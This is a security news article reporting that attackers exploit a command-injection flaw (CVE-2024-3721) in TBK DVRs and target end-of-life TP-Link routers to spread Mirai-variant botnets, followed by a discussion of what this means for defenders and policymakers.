What happens when a familiar tool of surveillance and an out‑of‑support router become a battlefield? Security researchers from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 report that threat actors have been exploiting vulnerabilities in TBK digital video recorders (DVRs) and end‑of‑life TP‑Link Wi‑Fi routers to seed Mirai‑family botnets on compromised devices.
What the researchers found
According to Fortinet FortiGuard Labs and Palo Alto Networks Unit 42, attackers are targeting security flaws in TBK DVR devices and end‑of‑life TP‑Link Wi‑Fi routers to install Mirai‑variant malware. The campaign observed against TBK DVRs uses CVE-2024-3721, described in the reporting as a command‑injection vulnerability with a CVSS score of 6.3 (medium severity).
Background on the exploited flaw
The vulnerability cited in the reports, CVE-2024-3721, is characterized in the source material as a command injection issue and assigned a CVSS score of 6.3. The researchers link active exploitation of that flaw to the deployment of Mirai‑style botnet code on the affected TBK DVR devices. The reporting also identifies end‑of‑life TP‑Link Wi‑Fi routers as additional targets used by the same or related actors to expand botnet capacity.
Why this matters
- For technologists: The combination of a medium‑severity command‑injection vulnerability and devices that are at or past vendor support creates an attractive path for automated compromise and malicious software installation, the researchers warn.
- For network operators and users: Compromised consumer and IoT devices repurposed as botnet nodes can be difficult to detect and remove, and devices that are end‑of‑life present fewer remediation options because vendor updates may no longer be available.
- For policymakers and defenders: The incident highlights an intersection of legacy hardware and active exploitation, with implications for risk management of deployed devices and for strategies addressing unsupported equipment in critical or residential networks.
- For adversaries: The observed activity demonstrates how known vulnerabilities in ubiquitous, low‑cost devices continue to be leveraged to assemble distributed attack infrastructure.
Analysis and implications
The reporting from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 ties a specific, named vulnerability to follow‑on Mirai‑variant activity, drawing a clear line between an identified software weakness and malicious botnet operations. That linkage underscores a familiar dynamic in device security: vulnerabilities with non‑critical CVSS ratings can nevertheless be weaponized at scale when they affect widely deployed or unsupported equipment.
Because the affected categories—DVRs and end‑of‑life home routers—are commonly located at the edge of networks, successful compromises may enable attackers to leverage otherwise inert devices for distributed denial‑of‑service (DDoS) campaigns or other large‑scale misuse. Even without immediate evidence of downstream impact in the source material beyond the deployment of Mirai variants, the researchers’ observations point to continued risks posed by vulnerable IoT and network devices.
The reporting also implicitly raises questions about lifecycle management for consumer and embedded devices, and the operational challenge of detecting and removing Mirai‑family malware once it has taken hold. Those managing networks that include such devices must weigh the tradeoffs of continued use versus replacement or segmentation, while defenders and policymakers may view the pattern as evidence of persistent attack vectors that merit coordinated attention.
Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 provide the attribution and technical detail in the source reporting. Their findings focus on exploitation of CVE-2024-3721 in TBK DVRs and the use of end‑of‑life TP‑Link Wi‑Fi routers in Mirai‑variant deployments.
If attackers can convert everyday network and camera hardware into a distributed attack platform, how long will it take for another overlooked device class to become the next botnet backbone?
